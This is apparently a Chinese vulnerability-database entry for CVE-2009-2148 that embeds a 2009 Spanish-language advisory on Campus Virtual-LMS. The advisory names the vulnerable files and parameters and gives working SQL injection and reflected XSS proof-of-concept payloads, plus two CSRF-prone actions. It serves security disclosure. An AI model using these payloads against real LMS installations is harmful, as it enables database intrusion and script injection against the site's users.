campus virtual-lms (xss/SQL Injection) Multiple Vulnerabilities

基本字段

漏洞编号：: SSV-66626

披露/发现时间：: 2009-06-22

提交时间：: 2014-07-01

漏洞等级：

漏洞类别：: 其他类型

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: CVE-2009-2148

CNNVD-ID：: CNNVD-200906-344

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.15KB

+-----------------------------------------------------------------------------+ LMS: Campus Virtual-LMS WEB: http://campusvirtualcomputrade.cae.net Autor: Yasión Fecha: 12 jun 2009 +-----------------------------------------------------------------------------+ -----------------------------------------------------------------------------+ [+] SQLi -----------------------------------------------------------------------------+ Archivo: news/index.php [no logged] GET: ?id Inyección: -1 union select 1,2,3,4,5,6,7 -----------------------------------------------------------------------------+ -----------------------------------------------------------------------------+ [+] XSS -----------------------------------------------------------------------------+ Archivo: enrolments/step1.php [no logged] GET: ?courseid Inyección: 1"><script>alert(/xD/.source)</script> Archivo: files/shared_list.php [logged] GET/POST: ?search Inyección: "><script>alert(/xD/.source)</script><!-- Archivo: files/shared_list.php [logged] GET: ?siteid Inyección: "><script>alert(/xD/.source)</script><!-- -----------------------------------------------------------------------------+ -----------------------------------------------------------------------------+ [+] CSRF -----------------------------------------------------------------------------+ Archivo: login/logout.php Info: Desconecta al usuario mediante una imagen, un redireccionamiento, un link... Archivo: enrolments/step2.php GET: ?action=[ACTION]&orderid=[ORDERID]&courseid=[COURSEID] Info: Añade o elimina [ADD/DELETE] el curso identificado por COURSEID a la cesta identificada por ODERID. Sería necesario conocer por adelantado la cesta del usuario. (No explotable) -----------------------------------------------------------------------------+ +-----------------------------------------------------------------------------+ Gretz: UnderSecurity.net +-----------------------------------------------------------------------------+ # milw0rm.com [2009-06-12]

共 3 兑换

参考链接

http://www.exploit-db.com/exploits/8937

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC
匿名兑换PoC
匿名兑换PoC

生命线

2009-06-22 发现/披露了漏洞
2014-07-01 提交了漏洞
2014-07-01 提交补充了漏洞详情
2014-07-01 提交更新了 PoC

campus virtual-lms (xss/SQL Injection) Multiple Vulnerabilities

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

campus virtual-lms (xss/SQL Injection) Multiple Vulnerabilities

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定